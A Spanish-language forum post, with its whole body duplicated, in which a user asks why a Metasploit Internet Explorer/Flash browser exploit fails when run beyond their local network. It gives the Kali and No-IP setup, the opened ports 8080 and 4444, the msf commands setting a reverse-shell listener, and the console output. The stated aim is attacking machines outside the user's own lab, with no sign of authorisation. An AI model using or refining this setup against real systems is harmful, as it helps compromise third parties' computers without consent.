Hola, bueno escribo este post por la siguiente rason, he estado intentando aprender como hacer un ataque fuera de mi Red Local con Metasploit, ya busque información por muchos lados y encontré muy buen material pero solo te enseñan ha hacer el ataque dentro de tu Red local.... con lo cual no tengo ningún problema he podido hacerlo con éxito dentro de entornos virtualizados con Windows Xp y Windows 7, pero respecto a hacerlo fuera de la Red Local no he encontrado material bueno....
para no hacerlo muy largo pondré las características de como lo he estado intentando llevar a cabo:
- Utilizo Kali linux en su ultima versión.
- Utilizo Metasploit
-Utilizo el Exploit para internet Explorer de Adobe Flash player:
windows/browser/adobe_flash_worker_byte_array_uaf (tambien he intentado con otros)
-Utilizo No-ip
-Configure el No-ip en Kali linux
-Agrege la No-ip a DDNS en mi Módem Residencial HG532e de infinitum.
-Abri los puertos 8080 y 4444
Configuro el Exploit de la siguiente manera:
msf > use exploit/windows/browser/adobe_flash_worker_byte_array_uaf
msf exploit(adobe_flash_worker_byte_array_uaf) >
set LHOST (mi Host No-ip) set LPORT (4444)
Exploit.....
como resultado me arroja lo siguiente:
msf exploit(adobe_flash_worker_byte_array_uaf) > exploit
[ * ] Exploit running as background job.
[ * ] Started reverse handler on 192.157.1.32:4444
msf exploit(adobe_flash_worker_byte_array_uaf) > [ * ] Using URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
[ * ] Local IP: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
[ * ] Server started.
perdonen mi ignorancia pero ¿no debería de aparecer mi no-ip en URL a usar?
¿Que estoy haciendo mal?
Agradecería mucho sus comentarios y ayuda.... tengo barios meses intentando lograr este tipo de ataque sin ningún éxito.
para no hacerlo muy largo pondré las características de como lo he estado intentando llevar a cabo:
- Utilizo Kali linux en su ultima versión.
- Utilizo Metasploit
-Utilizo el Exploit para internet Explorer de Adobe Flash player:
windows/browser/adobe_flash_worker_byte_array_uaf (tambien he intentado con otros)
-Utilizo No-ip
-Configure el No-ip en Kali linux
-Agrege la No-ip a DDNS en mi Módem Residencial HG532e de infinitum.
-Abri los puertos 8080 y 4444
Configuro el Exploit de la siguiente manera:
msf > use exploit/windows/browser/adobe_flash_worker_byte_array_uaf
msf exploit(adobe_flash_worker_byte_array_uaf) >
set LHOST (mi Host No-ip) set LPORT (4444)
Exploit.....
como resultado me arroja lo siguiente:
msf exploit(adobe_flash_worker_byte_array_uaf) > exploit
[ * ] Exploit running as background job.
[ * ] Started reverse handler on 192.157.1.32:4444
msf exploit(adobe_flash_worker_byte_array_uaf) > [ * ] Using URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
[ * ] Local IP: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
[ * ] Server started.
perdonen mi ignorancia pero ¿no debería de aparecer mi no-ip en URL a usar?
¿Que estoy haciendo mal?
Agradecería mucho sus comentarios y ayuda.... tengo barios meses intentando lograr este tipo de ataque sin ningún éxito.
